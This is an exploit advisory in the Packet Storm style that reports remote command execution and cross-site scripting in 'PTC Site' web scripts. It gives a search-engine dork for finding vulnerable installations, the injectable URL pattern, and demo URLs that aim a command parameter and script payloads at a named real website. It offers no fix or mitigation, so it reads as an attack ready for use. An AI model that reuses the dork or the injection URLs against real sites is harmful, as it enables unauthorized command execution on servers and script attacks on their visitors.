PTC Site's Remote Command Execution / Cross Site Scripting

2010-05-30T00:00:00
ID PACKETSTORM:90083
Type packetstorm
Reporter CrazyMember
Modified 2010-05-30T00:00:00

Description

                                        
                                            `  
  
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$  
  
@Title: PTC Site's RCE/XSS Vulnerability  
@Vendor: http://www.ptcsites4sale.info & and etc...:D  
@Author: CrazyMember  
@Mail: peymanteh@yahoo.com  
@SPC Thanks: XroGuE 4 r3p0r7 :P   
@Dork:"intext:Warning: passthru()" "inurl:view=help"  
  
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$  
  
@Bug: http://[site]/index.php?view=help&faq=1&ref=[RCE/XSS/HTML]  
  
Demo:   
  
#http://www.mysteryclickers.com/index.php?view=help&faq=1&ref=marykarma&cmd=[Your Commond]  
#http://www.mysteryclickers.com/index.php?view=help&faq=1&ref=[Your ScripT]  
  
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$  
  
  
  
  
  
  
  
`